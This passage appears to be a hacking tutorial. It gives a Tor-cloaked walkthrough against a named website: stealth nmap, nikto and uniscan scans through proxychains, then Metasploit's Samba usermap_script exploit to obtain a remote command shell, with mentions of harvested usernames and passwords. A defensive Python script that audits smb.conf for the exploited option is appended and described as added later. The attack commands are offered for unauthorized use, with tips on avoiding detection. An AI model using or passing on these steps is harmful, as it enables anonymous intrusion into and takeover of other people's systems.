anon@1337-817chs:~$sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105
Scan the site with nikto and uniscan, using proxychains to route the traffic over Tor:
anon@1337-817chs:~$sudo proxychains nikto -h www.Jihadist.ps && proxychains nikto -h 104.28.##.105
anon@1337-817chs:~$sudo proxychains ./uniscan -u https://www.Jihadist.ps/
That will take a while... Meanwhile, check your sqlmap results from chapter 1.
Any usernames or passwords? Ooh, goody...
On to Metasploit!!
The following info should have been obtained with the help of the Tor-cloaked scanning:
Target IP (from nslookup): 104.28.##.105
Target OS and version (from nmap, with "-Pn" set so it skips the ping to avoid detection; the
-Ss option tells nmap to perform a stealth scan, and the -A option tells it to try to discover the OS).
Kick it old school by googling "OS version Exploit Metasploit" to check for any quick exploit modules in Metasploit.
We need to find out the OS, the open ports and the services running on the target system.
Once you find an open port and service, like a Samba port, it's party time.
Fire up Metasploit
anon@1337-817chs:~$msfconsole
Route it through TOR
msf >set Proxies socks5:127.0.0.1:9050
We need to find the version of samba..
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) >set RHOST 104.28.##.105
RHOST => 104.28.##.105
msfauxiliary(smb_version) >set RPORT 445
RPORT => 445
msfauxiliary(smb_version) >exploit
With the version in hand, restart msfconsole; now we use the appropriate module...
anon@1337-817chs:~$msfconsole
msf >set Proxies socks5:127.0.0.1:9050
msf >use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 104.28.##.105
msf exploit(usermap_script) >exploit
We now have a command shell on the target box... have fun!
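The defender-side counterpart to the usermap_script step, added here and not part of the original post: a small Python audit that parses an smb.conf and flags the `username map script` option that the usermap_script module relies on. The sample config is constructed, and the key normalization (drop whitespace, lowercase) is assumed to mirror how Samba itself matches parameter names.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample smb.conf for demonstration; not taken from any real host.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   ; the option below is the one the usermap_script module abuses
   Username Map Script = /etc/samba/mapusers.sh
   server string = Samba Server

[homes]
   browseable = no
   read only = no
"""

# Options in [global] that should raise a flag during an audit (normalized form).
RISKY_GLOBAL_OPTIONS = {"usernamemapscript"}


def normalize(name: str) -> str:
    """Normalize a parameter name: strip all whitespace and lowercase it
    (assumed to match Samba's case- and whitespace-insensitive matching)."""
    return re.sub(r"\s+", "", name).lower()


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal smb.conf parser: '[section]' headers and 'key = value' lines.
    Lines starting with '#' or ';' are comments; continuation lines are not handled."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")  # split on the first '=' only
        sections[current][normalize(key)] = value.strip()
    return sections


def audit_smb_conf(text: str) -> List[Tuple[str, str]]:
    """Return (option, value) pairs for risky settings present in [global]."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    return [(opt, glob[opt]) for opt in sorted(RISKY_GLOBAL_OPTIONS) if opt in glob]


if __name__ == "__main__":
    for opt, val in audit_smb_conf(SAMPLE_SMB_CONF):
        print(f"[!] risky option in [global]: {opt} = {val}")
```

Run it against a real /etc/samba/smb.conf to confirm the option is absent, and treat any hit as a setting to remove or justify.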